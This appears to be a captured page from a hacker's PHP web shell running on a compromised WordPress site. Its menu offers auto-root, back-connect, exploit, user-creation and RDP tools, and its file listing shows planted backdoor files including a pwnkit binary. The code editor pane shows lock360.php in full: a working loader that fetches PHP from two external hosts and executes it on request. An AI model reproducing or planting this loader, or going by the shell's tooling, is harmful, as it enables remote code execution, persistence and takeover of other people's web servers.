Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
blueversionx /
[ HOME SHELL ]
Name
Size
Permission
Action
760093
[ DIR ]
drwxr-xr-x
seo
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwx---r-x
wp-content
[ DIR ]
drwx---r-x
wp-includes
[ DIR ]
drwx---r-x
.htaccess
250
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
admin.php
46.44
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
dex.php
77.53
KB
-rw-r--r--
gjklhuj.php
143.87
KB
-r--r--r--
license.txt
19.44
KB
-rw-r--r--
lock360.php
1.4
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.html
7.23
KB
-rw-r--r--
replace.php
49.12
KB
-rw-r--r--
worksec.php
1.06
KB
-r--r--r--
wp-activate.php
7.54
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw----r--
wp-comments-post.php
2.27
KB
-rw----r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.61
KB
-rw-rw-rw-
wp-config.phpx
3.46
KB
-rw----r--
wp-cron.php
5.49
KB
-rw----r--
wp-editor.php
53.57
KB
-rw-r--r--
wp-l0gin.php
170.48
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw----r--
wp-load.php
3.84
KB
-rw----r--
wp-login.php
51.3
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw----r--
wp-settings.php
32.38
KB
-rw-r--r--
wp-signup.php
34.26
KB
-rw-r--r--
wp-theme.php
216.5
KB
-rw-r--r--
wp-trackback.php
5.27
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lock360.php
<?php function GC($a) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c.lo62.xyz/'); if (!$code) { $code = GC('https://c2.icw7.com/'); } $need = '<' . '?' . 'php'; if (strpos($code, $need) === false) { die('get failed'); } if(function_exists('tmpfile')){ $file_name = tmpfile(); } if($file_name) { fwrite($file_name, $code); $a = stream_get_meta_data($file_name); $file_path = $a['uri']; @include($file_path); fclose($file_name); }else { $file_path = '.c'; file_put_contents($file_path, $code); @include($file_path); } @unlink($file_path); die(); }
Close